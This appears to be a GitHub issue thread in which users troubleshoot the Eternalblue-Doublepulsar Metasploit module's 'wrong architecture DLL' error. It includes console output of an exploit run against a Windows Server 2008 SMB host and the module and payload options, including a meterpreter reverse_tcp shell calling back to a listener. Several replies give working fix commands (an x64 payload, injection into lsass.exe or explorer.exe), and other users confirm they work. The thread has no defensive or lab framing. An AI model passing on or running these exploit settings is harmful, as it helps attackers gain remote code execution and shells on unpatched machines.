need help sending wrong DLL

[dharni-poker]

error：sending wrong targetarchitecture DLL to target

[Ahmedabdsalam]

dharni-poker you should check arch weather is x86 or x64 if x64 set payload as windows /x64/meterpreter.........and check TARGETARCHITECTURE ...and PROCESSINJECT lsass.exe for 64

[anwareset]

x64 --> set PROCESSINJECT lsass.exe and set TARGETARCHITECTURE x64 and set PAYLOAD windows/x64/meterpreter/reverse_tcp or bind_tcp or something else.

[azzarin]

Hey i have the same problem. trying to exploit a windows server 2008 x64. I have set PROCESSINJECT to lsass.exe and TARGETARCHITECTURE x64. Altso set TARGET to Windows Server 2008.

also windows/x64/meterpreter/reverce_tcp

] Started reverse TCP handler on 10.10.1.45:4444 [] 10.10.1.42:445 - Generating Eternalblue XML data [] 10.10.1.42:445 - Generating Doublepulsar XML data [] 10.10.1.42:445 - Generating payload DLL for Doublepulsar [] 10.10.1.42:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll [] 10.10.1.42:445 - Launching Eternalblue... [+] 10.10.1.42:445 - Backdoor is already installed [] 10.10.1.42:445 - Launching Doublepulsar... Error sending wrong architecture DLL to target [+] 10.10.1.42:445 - Remote code executed... 3... 2... 1... [] Exploit completed, but no session was created.

msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name Current Setting Required Description

---

DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Doublepulsar ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit/deps/ yes Path directory of Eternalblue PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.exe for x64) RHOST 10.10.1.42 yes The target address RPORT 445 yes The SMB service port (TCP) TARGETARCHITECTURE x64 yes Target Architecture (Accepted: x86, x64) WINEPATH /root/.wine/drive_c/ yes WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---

EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.1.45 yes The listen address LPORT 4444 yes The listen port

Exploit target:

Id Name

---

7 Windows Server 2008 R2 (x86) (x64)

[dharni-poker]

sorry man I have not solved this problem yet .

[azzarin]

Im not sure, but i do not have the issue anymore. Im not sure what fixed it. I did copy all the files from the "debs" folder into .wine/drive_c.

[ppdmartell]

@azzarin I came here because of the same cause but I guess you are using the wrong payload (x86 instead x64). You should use set payload windows/x64/meterpreter/reverse_tcp. However I'm using all your config even with the x64 payload and got the same result, I hope this work for you.

[azzarin]

@pedropabloDM i have solved my problem. Can't even remember the fix. but it works. thanks

[ppdmartell]

@azzarin That's great, although it's a shame you don't remember the fix, I'm currently stuck in there.

[ghost]

I use this technique : set payload windows/x64/meterpreter/reverse_tcp set processinject explorer.exe set targetarchitecture x64 run

[kareemalhourani]

@meijitm123 Thanks man it works for me :)

[umesh-verma]

Problem is not in the exploit its payload that is generating the error set meterpreter payload to x64

[lexsaints]

@azzarin I came here because of the same cause but I guess you are using the wrong payload (x86 instead x64). You should use set payload windows/x64/meterpreter/reverse_tcp. However I'm using all your config even with the x64 payload and got the same result, I hope this work for you.

works for me，thanks

[RootkitVega]

I use this technique : set payload windows/x64/meterpreter/reverse_tcp set processinject explorer.exe set targetarchitecture x64 run

This commands fix my error! Thanks.